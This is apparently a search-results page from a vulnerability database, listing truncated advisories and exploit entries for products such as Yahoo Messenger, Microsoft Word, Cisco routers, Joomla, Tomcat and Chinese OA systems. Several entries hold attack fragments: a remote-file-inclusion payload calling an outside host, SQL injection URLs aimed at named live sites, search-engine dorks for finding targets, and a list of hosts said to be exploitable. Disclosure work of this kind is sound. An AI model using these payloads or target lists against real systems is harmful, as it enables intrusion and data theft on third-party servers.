56796 matches found
Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2
No description provided by source. This affects the viewer ywcvwr.dll with yahoo messenger latest version tested. Fixed bug in last post x=0;x<i800;x++ should be x=0; x<800; x++ Here is your 2nd 0day!!! link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856 ...
Microsoft Word Malformed Data Structure Remote Code Execution Vulnerability (MS07-014)
Microsoft Word is a very popular word-processing office application released by Microsoft. Microsoft Word has a vulnerability when processing malicious documents containing malformed data structures; a remote attacker may exploit it to take control of a user's machine by tricking the user into opening a malicious document. If a user is tricked into opening a malicious Word document, a buffer overflow is triggered while parsing the malformed data structure in the document, leading to execution of arbitrary instructions. This vulnerability is currently being actively exploited by a Trojan named Trojan.Mdropper.X. Microsoft Word Viewer 2003 Microsoft Word 2004 for Mac Microsoft Word 2003 Microsoft Word 2002 Microsof...
Cisco RV34X Series Privilege Escalation Vulnerability (CVE-2021-1520)
Advisory: Cisco RV34X Series - Privilege Escalation in vpnTimer May 5, 2021 |In Research |By [email protected] TL;DR A few weeks ago, we published an advisory on the Cisco RV series routers, where we outlined the root cause for authentication bypass and remote command execution issues...
Remote code execution via multiple attack vectors in WAGO e!DISPLAY 7300T
VENDOR DESCRIPTION “New ideas are the driving force behind our success WAGO is a family-owned company headquartered in Minden, Germany. Independently operating for three generations, WAGO is the global leader of spring pressure electrical interconnect and automation solutions. For more than 60...
BACKDOOR IN SONY IPELA ENGINE IP CAMERAS
SEC Consult has found a backdoor in Sony IPELA Engine IP Cameras, mainly used professionally by enterprises and authorities. This backdoor allows an attacker to run arbitrary code on the affected IP cameras. An attacker can use cameras to take a foothold in a network and launch further attacks,...
OURPHP Registration Page SQL Injection Vulnerability
No description provided by source...
F5 TLS vulnerability (CVE-2016-9244) (Ticketbleed)
Ticketbleed CVE-2016-9244 is a software vulnerability in the TLS stack of certain F5 products that allows a remote attacker to extract up to 31 bytes of uninitialized memory at a time, which can contain any kind of random sensitive information, like in Heartbleed. If you suspect you might be...
HDCMS Content Management System spacecontroller.class.php username Parameter SQL Injection Vulnerability
0x01 Vulnerability summary: The HDCMS content management system has a SQL injection vulnerability in the username parameter in the file spacecontroller.class.php. 0x02 Vulnerability details: member/controller/spacecontroller.class.php public function init() { //username if ($username = Q('username')) { $uid = M('user')->where("username='$username'")->getField('uid'); go(U("index", array('uid' => $uid))); } $this->uid = Q('uid', 0, 'intval...
Hishop 易分销 Distribution System Brand.aspx and ProductUnSales.aspx SQL Injection Vulnerabilities (two injection points)
No description provided by source...
qemu Memory Leak Vulnerability (CVE-2015-8567)
No description provided by source. !/bin/bash This may be the simplest exp... The principle is simple: according to the detailed analysis, restarting the NIC calls vmxnet3activatedevice, and then the heap keeps allocating memory until the process crashes. This is a bash shell script. eth1 is the vmxnet3 device on my virtual machine here. From starting the run until the crash took me one afternoon nap, about 40 minutes. The actual situation depends on your own machine; the time varies. Run as root: while true do ifconfig eth1 down && echo 'Down!' ifconfig eth1 up &&...
Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure
No description provided by source. / cve-2010-3437.c Linux Kernel 2.6.36-rc6 pktcdvd Kernel Memory Disclosure Jon Oberheide [email protected] http://jon.oberheide.org Information: https://bugzilla.redhat.com/showbug.cgi?id=638085 The PKTCTRLCMDSTATUS device ioctl retrieves a pointer to a...
Yonyou Office Platform SQL Injection Vulnerability (system)
Brief description: Detailed description: Boss, Uncle Mad Dog..... it's generic. Awaiting confirmation. All versions have a SQL injection vulnerability that takes the server directly... no login required. intitle:"fe协作" Affected customer groups: large enterprises (e.g. Lafang Group and other very large enterprises), schools (Beijing Normal University), pharmaceuticals, government (e.g. Zhuhai Civil Air Defense Office, Guangdong Fishery Administration Zhuhai Detachment, Guangdong Coal Geology Bureau, etc.), energy (power grid), banks, etc. http://oa.bamatea.com http://oa.moonbasa.com http://oa.etonetech.com http://oa.ztcz.cn http://218.249.130.74...
Joomla! Pbbooking Component 'manage.php' Cross-Site Scripting Vulnerability
Bugtraq ID:66257 CVE ID:CVE-2013-5955 Joomla! is a well-known content management system abroad. The Joomla! Pbbooking component 'manage.php' script does not properly filter user-submitted input, allowing remote attackers to exploit the vulnerability for cross-site scripting attacks, which can obtain sensitive information or hijack user sessions. 0 Joomla! Pbbooking 2.4 No detailed solution is currently available: http://www.joomla.org/ form...
Adobe Flash Player and AIR Remote Code Execution Vulnerability (CVE-2014-0502)
BUGTRAQ ID: 65702 CVECAN ID: CVE-2014-0502 Adobe Flash Player is an integrated multimedia player. Adobe AIR is a technology developed for combining web and desktop applications, which can control cloud programs on the network without going through a browser. Adobe Flash Player and AIR have multiple vulnerabilities when handling malicious web pages containing specially crafted Flash content, including a stack overflow, a memory leak and a double free; an unauthenticated remote attacker can exploit these vulnerabilities to execute arbitrary code and ultimately take complete control of the affected system. 0 Adobe Flash Player 12.0.0.44 Adobe Flash Player 11.2.202.336...
Apache Commons FileUpload/Apache Tomcat Denial of Service Vulnerability
BUGTRAQ ID: 65400 CVECAN ID: CVE-2014-0050 The Apache Commons FileUpload package adds high-performance file upload functionality to servlets and web applications. Apache Tomcat is a popular open-source JSP application server. Apache Commons FileUpload has a vulnerability when parsing a malformed Content-Type header; using a specially crafted request, a remote attacker may crash the program. 0 Commons FileUpload 1.0-1.3 Apache Tomcat 8.0.0-RC1-8.0.1 Apache Tomcat 7.0.0-7.0.50 Apache Tomcat 6...
Drupal CKEditor Module Arbitrary Code Execution Vulnerability
Drupal is an open-source CMS that can serve as the content management platform for all kinds of websites. The Drupal CKEditor module has an unspecified security vulnerability: when the core PHP module is enabled, it allows remote authenticated users or remote attackers to execute arbitrary PHP code via the text parameter in a text filter. 0 Drupal CKEditor Module 6.x Drupal CKEditor Module 7.x Drupal FCKeditor Module 6.x Vendor solution: Drupal CKEditor Module 6.x-2.3, CKEditor Module 6.x-1.9, CKEditor Module...
IBM Lotus Expeditor Request Header Spoofing Security Restriction Bypass Vulnerability
BUGTRAQ ID: 54163 CVE ID: CVE-2012-0191 IBM Lotus Expeditor, formerly known as IBM WebSphere Everyplace Deployment, is a managed client for creating, deploying and maintaining various applications. The web container in IBM Lotus Expeditor 6.1.x and 6.2.x versions prior to 6.2 FP5+Security Pack does not properly enforce access control on requests; a security restriction bypass vulnerability exists in the implementation, which may allow remote attackers to bypass certain security restrictions via specially crafted request headers. 0 IBM Lotus Expeditor Vendor patch: IBM ---...
OpenLDAP CA SSL Certificate Validation Vulnerability
CVE ID: CVE-2009-3767 OpenLDAP is an open-source implementation of the Lightweight Directory Access Protocol (LDAP). When using OpenSSL, OpenLDAP's libraries/libldap/tlso.c library does not properly handle null characters (\0) in the domain name of the X.509 certificate subject Common Name (CN) field; when processing a certificate field containing a null character, it incorrectly treats the null character as a terminator and therefore only validates the portion before the null. For example, for a name like: example.com\0.haxx.se the certificate was issued to haxx.se, but the /tlso.c library incorrectly validates it for example.com, which helps attackers carry out phishing and similar spoofing via man-in-the-middle attacks....
WordPress wp-admin Unauthorized Administrative Access Vulnerability
BUGTRAQ ID: 35935 CVECAN ID: CVE-2009-2853,CVE-2009-2854 WordPress is a free forum/blog system. WordPress does not check user permissions for certain operations; a remote attacker can perform unauthorized edit or add operations by directly requesting edit-comments.php, edit-pages.php, edit.php, edit-category-form.php, edit-link-category-form.php, edit-tag-form.php, export.php, import.php or link-add.php in wp-admin/, or by directly requesting...
CUPS cups/ipp.c Null Pointer Dereference Denial of Service Vulnerability
BUGTRAQ ID: 35169 CVECAN ID: CVE-2009-0949 Common Unix Printing System (CUPS) is a general-purpose Unix printing system, a cross-platform printing solution for Unix environments based on the Internet Printing Protocol, providing services for most PostScript and raster printers. When processing a specially crafted IPP request containing two IPPTAGUNSUPPORTED tags, the ippReadIO function in the CUPS cups/ipp.c file does not properly initialize the ipp structure, which may cause the affected application to crash. The ippReadIO function in cups/ipp.c is responsible for initializing the ipp structures representing the different tags in the current IPP request...
vsp stats processor 0.45 (gamestat.php gameID) SQL Injection Vuln
No description provided by source. Product : vsp stats processor Version : all Dork : "powered by vsp stats processor" Site: http://www.scivox.net/vsp/ Found by: Dimi4 Date : 31.03.09 Greetz: antichat SQL-injection + URL:...
Joomla/Mambo Component eXtplorer Code Execution Vulnerability
No description provided by source. ============================================= INTERNET SECURITY AUDITORS ALERT 2009-002 - Original release date: January 7th, 2009 - Last revised: March 2nd, 2009 - Discovered by: Juan Galiana Lara - Severity: 9/10 CVSS scored...
DMXReady Contact Us Manager <= 1.1 Remote Contents Change Vuln
No description provided by source. Title : DMXReady Contact Us Manager = 1.1 Remote Contents Change Vulnerability Author : "ajann" from Turkey Contact : : S.Page : http://www.dmxready.com $$ : 49.97 $ Dork : inurl:inccontactusmanager.asp DorkEx :...
Microsoft Windows SMB Credential Reflection Vulnerability (MS08-068)
BUGTRAQ ID: 7385 CVECAN ID: CVE-2008-4037 Windows is a very popular operating system released by Microsoft. When a user connects to an attacker's SMB server, a remote code execution vulnerability exists in the way the Microsoft Server Message Block (SMB) protocol handles NTLM credentials, allowing an attacker to replay the user's credentials and execute code in the context of the logged-on user. If the user is logged on with administrative privileges, an attacker who successfully exploited this vulnerability could take complete control of the affected system. The attacker could then install programs; view, change or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system are less affected than users who operate with administrative user rights. Microsoft Windows XP S...
RhinoSoft Serv-U FTP Server 'rnto' Command Directory Traversal Vulnerability
BUGTRAQ ID: 31563 CNCAN ID:CNCAN-2008100610 RhinoSoft Serv-U FTP Server is a popular FTP server program. Serv-U FTP Server does not properly handle the 'rnto' command; a remote attacker can exploit the vulnerability to view the contents of system files with application privileges. The 'rnto' command does not properly filter input; constructing a string containing "../" characters as the argument can bypass directory restrictions and view system file contents with application privileges. RhinoSoft Serv-U 7.2.1 No solution is currently available: http://www.serv-u.com/ http://www.sebug.net/exploit/4803...
Linux Kernel 'truncate()' Local Privilege Escalation Vulnerability
BUGTRAQ ID: 31368 CVE ID:CVE-2008-4210 CNCVE ID:CNCVE-20084210 Linux is an open-source operating system. The Linux kernel 'truncate' and 'ftruncate' functions have a design error that a local attacker can exploit to escalate privileges. When creating a file, open/creat allow the setgid bit to be set via the mode argument; because of the bsdgroups mount option or creation of the file in a setgid directory, the user may not be a member of the new file's group. The user can use ftruncate and memory-mapped I/O to turn the new file into an arbitrary binary and gain the privileges of that group, because these operations do not clear the setgid bit....
Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability
No description provided by source. Title: Apache Tomcat Directory Traversal Vulnerability Author: Simon Ryeobar4mi at gmail.com, barami at ahnlab.com Severity: High Impact: Remote File Disclosure Vulnerable Version: prior to 6.0.18 Solution: - Best Choice: Upgrade to 6.0.18 http://tomcat.apache.o...
Boa 0.93.15 HTTP Basic Authentication Bypass Exploit
No description provided by source. / Boa HTTP Basic Authentication Bypass Vuln: Boa/0.93.15 with Intersil Extensions Original Advisory: http://www.securityfocus.com/archive/1/479434 http://www.ikkisoft.com/stuff/SN-2007-02.txt Luca "ikki" Carettoni http://www.ikkisoft.com / ---- !/usr/bin/env...
Check Point VPN-1/FireWall-1 4.1 SP2 Blocked Port Bypass Exploit
No description provided by source. / Summary A vulnerability exists in Check Point VPN-1/FireWall-1 4.1 SP2 that enables an attacker to establish connections to blocked TCP services through the firewall in certain configurations. We expect many deployed FireWall-1 installations to be immune to th...
IBM Lotus Domino Server 6.5 (username) Remote Denial of Service Exploit
No description provided by source. !/usr/bin/python Remote DOS exploit code for IBM Lotus Domino Server 6.5. Tested on windows 2000 server SP4. The code crashes the IMAP server. Since this is a simple DOS where 256+ but no more than 270 bytes for the username crashes the service...
Trend Micro OfficeScan Wizard and CgiRemoteInstall Remote Buffer Overflow Vulnerabilities
Trend Micro OfficeScan is a popular anti-virus solution. Trend Micro OfficeScan has multiple security issues that a remote attacker can exploit to carry out denial-of-service or buffer overflow attacks against the application. The problem lies in buffer overflow errors in the "PCCSRV\Webconsole\RemoteInstallCGI\Wizard.exe" and "PCCSRV\Webconsole\RemoteInstallCGI\CgiRemoteInstall.exe" components when handling malformed parameters; submitting carefully constructed data may lead to execution of arbitrary instructions with the privileges of the application service process. Trend Micro OfficeScan Corporate Editi...
phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability
No description provided by source. PhpwCMS 1.2.6 = Multiple Remote file inclusion vulnerabilities Discovered by : |/| . .. | || ||| | | Vuln In : include $spawroot.'class/lang.class.php'; Affected Files : include/incext/spaw/dialogs/table.php include/incext/spaw/dialogs/a.php...
Retro64 CR64Loader ActiveX Remote Buffer Overflow Vulnerability
The CR64Loader object is an ActiveX control provided by Retro64 for online games. The implementation of CR64Loader has a buffer overflow vulnerability; if a user is tricked into visiting a malicious web page, the vulnerability is triggered, leading to execution of arbitrary instructions. Retro64 CR64Loader Temporary workaround: Set the kill bit for the following CLSID: 288C5F13-7E52-4ADA-A32E-F5BF9D125F99 Vendor patch: Retro64 ------- We recommend that users of this software keep an eye on the vendor's home page for the latest version: http://retro64.com/...
Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability
No description provided by source. Title: Limbo CMS = 1.04 Remote File Inclusion URL: http://www.limbo-cms.com/ Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS" Credits: Oo Exploit: /classes/adodbt/sql.php?classesdir=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-04-29...
New ceoAnyone Bug Identified in Multiple Crypto Game Smart Contracts (CVE-2018-11329)
Our vulnerability-scanning system at PeckShield has so far discovered several dangerous smart contract vulnerabilities batchOverflow1, proxyOverflow2, transferFlaw3, ownerAnyone4, multiOverflow5, burnOverflow6. These vulnerabilities typically affect various tokens that may be publicly traded in...
CPP-Ethereum JSON-RPC Denial Of Service Vulnerabilities(CVE-2017-12119)
Summary An exploitable unhandled exception vulnerability exists in multiple APIs of CPP-Ethereum's JSON-RPC. Specially crafted JSON requests can cause an unhandled exception resulting in denial of service. An attacker can send malicious JSON to trigger this vulnerability. Tested Versions Ethereum...
CPP-Ethereum JSON-RPC admin_addPeer Authorization Bypass Vulnerability(CVE-2017-12112)
Summary An exploitable improper authorization vulnerability exists in adminaddPeer API of cpp-ethereum's JSON-RPC commit 4e1015743b95821849d001618a7ce82c7c073768. A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to...
Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution
Description WebCTRL suffers from an authenticated arbitrary code execution vulnerability. The issue is caused due to the improper verification when uploading Add-on .addons or .war files using the uploadwarfile servlet. This can be exploited to execute arbitrary code by uploading a malicious web...
Broadcom: OOB write when handling 802.11k Neighbor Report Response(CVE-2017-11120)
Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. In order to allow fast roaming between access...
一采通 E-Procurement System Arbitrary File Upload Getshell (UploadFile.aspx)
No description provided by source...
网康 NS-ASG Application Security Gateway Command Execution Vulnerability
No description provided by source...
Seeyon (致远) A8-V5 Collaborative Management Software Unauthorized Access (affects all V5, obtains various cached information within the system)
Brief description: The Seeyon A8-V5 collaborative management software has an unauthorized access issue: system-privilege pages can be accessed with ordinary user privileges, obtaining large amounts of cached information such as user information. Detailed description: Using a weak-password user obtained through the previously submitted vulnerability "Seeyon A8-V5 Collaborative Management Software Log Information Disclosure (affects all V5)" to test http://a8v51.seeyon.com, it was found that the Seeyon A8-V5 collaborative management software also has an unauthorized access issue: system-privilege pages can be accessed with ordinary user privileges, obtaining large amounts of cached information, e.g. 2000+ user records. Proof of vulnerability: Log in as an ordinary user, visit http://a8v51.seeyon.com/seeyon/ctp/sysmgr/monitor/cacheDump.do...
Kerio Control 8.3.1 - Blind SQL Injection Vulnerability
No description provided by source...
GLPI install.php Remote Command Execution
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
Pligg CMS (story.php?id) 1.0.4 - SQL Injection Vulnerability
No description provided by source. / ! Pligg CMS story.php?id SQL Injection Vulnerability ! Author : Don Tukulesto [email protected] ! Homepage: http://indonesiancoder.com ! Date : Tue, April 27, 2010 ! Tune in : http://antisecradio.fm choose your weapon / Software Information Vendor :...
Xxasp 3.3.2 - SQL Injection
Securitylab.ir Application Info: Name: Xxasp Version: 3.3.2 Discoverd By: [email protected] Website: http://securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir ===========================================================...
Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
No description provided by source. $Id: exim4stringformat.rb 11352 2010-12-16 17:30:24Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms ...
Google Chrome < 14.0.835.163 PDF File Handling Memory Corruption
No description provided by source. ----------------Security Advisory---------------- Title: Google Chrome 14.0.835.163 PDF File Handling Memory Corruption Vulnerability CVE-2011-2841 Sec-Security: High CVE-Number: CVE-2011-2841 Date of discovery: 04/06/2011MM/DD/YYYY Fix date: 06/28/2011MM/DD/YYYY...
Eyeland Studio Inc. SQL Injection Vulnerability
No description provided by source. Title: Eyeland Studio Inc. SQL Injection Vulnerability Version: 2.0 Author: Mr.P3rfekT Software Site:http://www.eyeland.com/ Tested on Linux CVE : N/A Home :www.realmadridsy.com & www.v4-team.com/cc Found By Mr.P3rfekT Dork :Eyeland Studio Inc. All Rights...
Zoomla (逐浪) CMS SQL Injection and Filter Bypass
Brief description: Demonstrated on the official site and the demo site; bypasses the injection filter. Detailed description: This point: http://www.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 http://demo.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 Like this:...